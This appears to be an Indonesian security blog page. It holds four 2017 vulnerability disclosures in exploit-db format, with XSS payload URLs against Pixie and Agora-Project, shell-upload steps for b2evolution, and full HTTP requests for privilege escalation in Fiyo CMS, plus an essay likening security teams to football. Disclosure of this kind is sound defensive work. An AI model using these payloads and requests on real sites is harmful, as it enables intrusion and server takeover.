Open Source

Untuk seluruh software yang bersifat Open Source tidak akan tenggelam oleh waktu dikarenakan banyak yang mendukung program tersebut dan software tersebut tidak kalah bersaing dengan software berbayar lainnya.

Certified

Mengambil sertifikasi semata-mata bukan untuk menjadi tenar atau sombong, tapi untuk mengetahui apakah anda mampu mengemban tanggung jawab secara moral terhadap apa yang anda telah pelajari dan bagaimana memberikan ilmu tersebut kepada orang lain tanpa pamrih.

Operating System Pentest

Sistem operasi Bactrack, Kali Linux, dll memang sangat memanjakan para Pentester dalam melaksanakan tugasnya sesuai dengan prosedur yang berlaku. Di OS tersebut disediakan beberapa tools menarik seperti untuk memperoleh information gathering, vulnerability assesment, exploit, dll.

Sherlock Holmes

Film detektif yang satu ini pasti disukai oleh beberapa rekan IT dikarenakan proses jalan ceritanya ketika memecahkan sebuah kasus tidak monoton dan memerlukan logika berpikir yang diluar kebiasaan. Daya hayal harus tinggi ketika ingin menonton film ini.

Forensic

Kegiatan forensic bidang IT sangat membutuhkan tingkat pemahaman yang tinggi akan suatu kasus yang ditangani. Tim yang menangani forensic harus bisa membaca jalan pikiran si Attacker seperti apa jika melakukan serangan. Biasanya Attacker lebih maju selangkah dibanding dengan tim pemburunya.

Jumat, 31 Maret 2017

Multiple XSS Vulnerability on Pixie 1.0.4

# Exploit Title: Multiple XSS Vulnerability on Pixie 1.0.4
# Google Dork: no
# Date: 29-03-2017
# Exploit Author: @rungga_reksya, @dickysofficial
# Vendor Homepage: http://www.getpixie.co.uk
# Software Link: https://us.softpedia-secure-download.com/dl/44791fdde14260bc7a8d08df65bcd048/58db4b5c/700044699/webscripts/php/pixie_v1.04.zip
# Version: 1.0.4
# Tested on: Windows Server 2012 Datacenter Evaluation


I. Background:
Pixie is a free, open source web application that will help quickly create your own website. Many people refer to this type of software as a "content management system (cms)", we prefer to call it as Small, Simple, Site Maker.

II. Description:
XSS Vulnerability on Pixie 1.0.4

We found Multiple XSS on admin folder perimeters:

s=login&m=
s=settings&x=
s=publish&m=static&x=
s=publish&m=dynamic&x=
s=publish&m=module&x=


III. Exploit:

 
- http://ip_address/folder_pixie_v1.04/admin/?s=login&m="><img src=x onerror=prompt(/PAYLOADXSS/)> or http://ip_address/folder_pixie_v1.04/admin/index.php?s=login&m="><img src=x onerror=prompt(/PAYLOADXSS/)>


- http://ip_address/folder_pixie_v1.04/admin/index.php?s=settings&x="><img src=x onerror=prompt(/PAYLOADXSS/)>


- http://ip_address/folder_pixie_v1.04/admin/index.php?s=publish&m=static&x="><img src=x onerror=prompt(/PAYLOADXSS/)>


- http://ip_address/folder_pixie_v1.04/admin/index.php?s=publish&m=dynamic&x="><img src=x onerror=prompt(/PAYLOADXSS/)>


- http://ip_address/folder_pixie_v1.04/admin/index.php?s=publish&m=module&x="><img src=x onerror=prompt(/PAYLOADXSS/)>


IV. Thanks to:
- Alloh SWT
- https://packetstormsecurity.com/files/126870/Pixie-CMS-1.04-Cross-Site-Scripting.html
- MyBoboboy
- @dickysofficial
- Komunitas IT Auditor & IT Security Kaskus
- Openbugbounty.org

Selasa, 14 Maret 2017

Remote File Upload Vulnerability in b2evolution 6.8.8

# Exploit Title: Remote File Upload Vulnerability in b2evolution 6.8.8
# Google Dork: no
# Date: 14-03-2017
# Exploit Author: @rungga_reksya, @dvnrcy, @yokoacc
# Vendor Homepage: http://b2evolution.net
# Software Link: http://b2evolution.net/downloads/6-8-8?download=6883
# Version: 6.8.8 Stable
# Tested on: Windows Server 2012 Datacenter Evaluation
# CVE : no

I. Background:
b2evolution is a tool that allows you to build your own website. This ranges from just a home page to a full featured site with multiple blogs, forums for your user community and structured content such as manuals or knowledge bases. Additionally, b2evolution allows you to send newsletters to your user community and members can send private messages to each other.

II. Description:
Unrestricted file upload vulnerability in “file upload” modules in B2evolution CMS 6.8.8 allows authenticated user to upload malicious code (shell), even though in the system has restricted extension (php).

III. Exploit:
In this case, we have privilege as administrators and then access to “files menu” (http://HOST/b2evolution/admin.php?ctrl=files). Choose your directory and upload your shell with php extension.

e.g you choose “admin” folder, so access your shell such as:
http://HOST/b2evolution/media/users/admin/[YOUR_SHELL]

IV. Thanks to:
- Alloh SWT
- MyBoboboy
- @yokoacc, @dvnrcy
- Komunitas IT Auditor & IT Security Kaskus





V. Screenshot/POC:


php extension was blocked

determine your directory

succeed to upload shell

take over operating system server
 

Senin, 13 Maret 2017

XSS Vulnerability on Agora-Project 3.2.2

# Exploit Title: XSS Vulnerability on Agora-Project 3.2.2
# Google Dork: no
# Date: 23-02-2017
# Exploit Author: @rungga_reksya, @AdyWikradinata, @yokoacc
# Vendor Homepage: https://www.agora-project.net
# Software Link: https://www.agora-project.net/?ctrl=offline&action=download
# Software Link Mirror: https://jaist.dl.sourceforge.net/project/agora-project/agora_project_3.2.2.zip
# Version: 3.2.2
# Tested on: Windows Server 2012 Datacenter Evaluation
# CVE : CVE-2017-6559, CVE-2017-6560, CVE-2017-6561, CVE-2017-6562

I. Background:
Agora-Project is a workspace dedicated to collaboration and information exchange. Complete and intuitive, this tool is accessible via a simple web browser. Ideal for teamwork, it facilitate the exchange and creativity of a group around a common project, releasing the constraints of time and space.

Agora-Project is ideal for small structures such as associations, schools or SME, but is also suitable for larger organizations by allowing the establishment of subspaces.

II. Description
Vulnerability on CMS Agora is XSS

III. Exploit
No Login:


http://IP_Address/folder_agora_project_3.2.2/index.php?disconnect=1&msgNotif[]="><img src=x onerror=prompt(/XSS/)>
http://IP_Address/folder_agora_project_3.2.2/index.php?ctrl=misc&action="><img src=x onerror=prompt(/XSS/)>&editObjId="><img src=x onerror=prompt(/XSS/)>

Needed login:


http://IP_Address/folder_agora_project_3.2.2/index.php?ctrl=object&action="><img src=x onerror=prompt(/XSS/)>_id="><img src=x onerror=prompt(/XSS/)>
http://IP_Address/folder_agora_project_3.2.2/index.php?ctrl=file&targetObjId=fileFolder-2&targetObjIdChild="><img src=x onerror=prompt(/XSS/)>


IV. Thanks to
- Alloh SWT
- https://www.exploit-db.com/exploits/19329 (Chris Russell)
- MyBoboboy
- @AdyWikradinata, @yokoacc
- Komunitas IT Auditor & IT Security Kaskus
- Openbugbounty.org

Sabtu, 11 Maret 2017

Privilege Escalation (Manipulation of User Group) Vulnerability on Fiyo CMS 2.0.6.1

# Exploit Title: Privilege Escalation (Manipulation of User Group) Vulnerability on Fiyo CMS 2.0.6.1
# Google Dork: no
# Date: 11-03-2017
# Exploit Author: @rungga_reksya, @dvnrcy
# Vendor Homepage: http://www.fiyo.org
# Software Link: https://sourceforge.net/projects/fiyo-cms
# Version: 2.0.6.1
# Tested on: Windows Server 2012 Datacenter Evaluation
# CVE : CVE-2017-6823

I. Background:
Fiyo CMS dikembangkan dan dibuat pertama kali oleh mantan seorang pelajar SMK yang pada saat itu bersekolah di SMK 10 Semarang jurusan RPL. Pada zaman itu namanya bukan Fiyo CMS melainkan Sirion yang merupakan akronim dari Site Administration.

II. Description:
Privilege Escalation (Manipulation of User Group) Vulnerability on Fiyo CMS 2.0.6.1

III. Exploit:
Fiyo CMS have five user group (super administrator, administrator, editor, publisher, member) and only three group can access backend page of admin (super administrator, administrator and editor).

If we login as super administrator and access edit profile menu, check source code (ctrl+u) from your browser and we get level privilege:
super administrator = 1
administrator = 2
editor = 3
publisher = 4
member = 5

Ok, prepare your tool like burpsuite to intercept traffic. in this case I login as editor and I want manipulation of editor group (level=3) to be super administrator group (level=1).  The first you access on menu “Edit Profile” and click “Simpan (Save)”, and then change like this on your burpsuite intercept menu:

Original:

POST /fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3 HTTP/1.1
Host: 192.168.1.2
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2/fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3
Cookie: c40cded1c770e0ead20a6bcbf9a26edf=hplreme8us3iem3jg36km36ob5; PHPSESSID=dcj4n83jd2tdrjs32fo6gm9eq7
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 134

edit=Next&id=3&z=editor&user=editor&z=editor&x=&password=editor&kpassword=editor&email=editor%40localhost.com&level=3&name=editor&bio=


Manipulation (Change Level=3 to be Level=1):

POST /fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3 HTTP/1.1
Host: 192.168.1.2
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2/fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3
Cookie: c40cded1c770e0ead20a6bcbf9a26edf=hplreme8us3iem3jg36km36ob5; PHPSESSID=dcj4n83jd2tdrjs32fo6gm9eq7
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 134

edit=Next&id=3&z=editor&user=editor&z=editor&x=&password=editor&kpassword=editor&email=editor%40localhost.com&level=1&name=editor&bio=

Yeaaah, now editor become super administrator privilege ^_^ and The level of administrator can be super administrator too.


IV. Thanks to:
- Alloh SWT
- MyBoboboy
- MII CAS
- Komunitas IT Auditor & IT Security Kaskus


Refer:
https://www.owasp.org/index.php/Testing_for_Privilege_escalation_(OTG-AUTHZ-003)

https://en.wikipedia.org/wiki/Privilege_escalation

Screenshot:

Step One - login as editor and access menu for edit user

Step two - check on source code for level

step three - Intercept and found level 3 as editor

step four - change your level from 3 (editor) to 1 (super administrator)

step five - Success to update your profile and please logout

step six - yeah success to be super administrator

Jumat, 10 Maret 2017

Information Security Look Like Football


Information security inside an organization look like a football game. Each person has different role and responsibility but having a common goal. The goal is to securing data and information of organization from technical level to strategic level.

We can map the roles exists in football to each member of IT security team, such as:

- The goal keeper and defender, they are the sysadmin and infrastructure network team. Protecting the assets at all cost. Their solid defense is contributed not only by their skills and knowledge, but also from the support of tools like firewall, SIEM, etc.

- The midfielder, or the one who balance the team. Their position is vital to maintain the game-play. They can be in backward position and in forward position in another time. They go by the name Information Security Officer, Division of Risk Management Internal, and Division of Compliance.

- The strikers, or the man who play the offensive parts. They are Information Security Consultant and Pentester. Their sole purpose is to penetrate the foe and scored a goal.

- The coach is the Top management. They oversee the game and take all responsibility of all result. Giving morale, guide the team, and decide what tactic should be used in the game.

- The tactic is like a information-security framework. The framework manage the position and task for each person in the team. It is also used to deciding the process when the game is on, either going defensive, offensive, or fortify the middle position to maintain the balance. Every tactic has advantage and disadvantage.

- Last but not least, the supporter. They are the stakeholder who has interests and concerns to the organization. They will support the team to be successful in running the business process inside the organization.

Thanks to:
@AdyWikradinata
@dvnrcy